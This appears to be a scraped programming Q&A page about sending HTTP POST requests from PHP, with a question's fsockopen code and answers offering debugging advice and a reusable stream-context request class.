On the other hand -- seeing you are mailing one and the same e-mail address -- you could also simply save the failing domains in an array, and mail them all in one e-mail after you're done checking of course.
You can just store everything in a multidimensional array and put an iterator around the entire working section of code.
$list_of_sites[0]["url"] = blah;
$list_of_sites[0]["text"] = blah;
$list_of_sites[1]["url"] = blah;
$list_of_sites[1]["text"] = blah;
foreach($list_of_sites as $site){
$url = $site["url"];
$text = $site["text"];
check($url, $text);

php socket http post not working

I'm trying to write a php script to send a http post request to a url. It doesnt seem to pass through for the server is not receiving it. Can anyone help?
function postXMLToURL ($server, $path, $xmlDocument) {
$xmlSource = $xmlDocument;
$contentLength = strlen($xmlSource);
//$fp = fsockopen($server, 80);
$fp = fsockopen($server,8080);
fwrite($fp, "POST $path HTTP/1.0\r\n");
fwrite($fp, "Host: $server\r\n");
fwrite($fp, "Content-Type: application/xml\r\n");
fwrite($fp, "Content-Length: $contentLength\r\n");
fwrite($fp, "Connection: close\r\n");
fwrite($fp, "\r\n"); // all headers sent
fwrite($fp, $xmlSource);
$result = '';
while (!feof($fp)) {
$result .= fgets($fp, 128);
return $result;
function getBody ($httpResponse) {
$lines = preg_split('/(\r\n|\r|\n)/', $httpResponse);
$responseBody = '';
$lineCount = count($lines);
for ($i = 0; $i < $lineCount; $i++) {
if ($lines[$i] == '') {
for ($j = $i + 1; $j < $lineCount; $j++) {
$responseBody .= $lines[$j] . "\n";
return $responseBody;
$xmlDocument = new DomDocument($final_xml); //final_xml is my xml in a string
$result = postXMLtoURL("localhost", "/resources", $xmlDocument);
$responseBody = getBody($result);
$resultDocument = new DOMDocument();
header('Content-Type: application/xml');
echo $resultDocument->saveXML();
You need to learn how to help yourself.
There's no error detection in the code - you should at least check fp is valid after the call to fsockopen, for preference there should be a LOT more error checking.
Also, get hold of something like wireshark and see what packets your code is generating.
You could aso use stream_context_create();
Once i wrote a php class you are wecome to use it.
class HTTPRequest
protected $url;
protected $method;
protected $headers;
protected $data = "";
protected $useragent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
public function __construct(){}
public function setHeaders($headers)
$this->headers = $headers;
return true;
return false;
public function get($request)
throw new Exception("Please set Headers");
$this->url = $request;
$this->method = "GET";
return $this->send();
public function put($request,$xml)
throw new Exception("Please set Headers");
$this->url = $request;
$this->method = "PUT";
$this->data = $xml;
return $this->send();
public function post($request,$xml)
throw new Exception("Please set Headers");
$this->url = $request;
$this->method = "POST";
$this->data = $xml;
return $this->send();
public function delete($request)
throw new Exception("Please set Headers");
$this->url = $request;
$this->method = "DELETE";
return $this->send();
public function setUserAgent($useragent)
$this->useragent = $useragent;
protected function send()
$params = array('http' => array
'method' => $this->method,
'content' => $this->data,
'user_agent' => $this->useragent
$headers = "";
if (!empty($this->headers) && is_array($this->headers))
foreach ($this->headers as $header)
$headers .= $header."\n";
$params['http']['header'] = $headers;
$context = stream_context_create($params);
$fp = fopen($this->url, 'r', false, $context);
if (!$fp)
throw new Exception("Problem with ".$this->url);
$response = stream_get_contents($fp);
if ($response === false)
throw new Exception("Problem reading data from ".$this->url);
return $response;
